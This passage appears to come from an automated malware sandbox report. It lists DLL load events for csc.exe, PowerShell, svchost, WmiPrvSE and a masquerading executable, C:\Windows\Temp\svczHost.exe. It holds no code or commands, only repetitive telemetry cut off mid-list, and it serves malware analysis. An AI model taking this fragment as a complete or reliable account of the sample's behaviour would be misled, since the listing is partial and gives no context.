        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
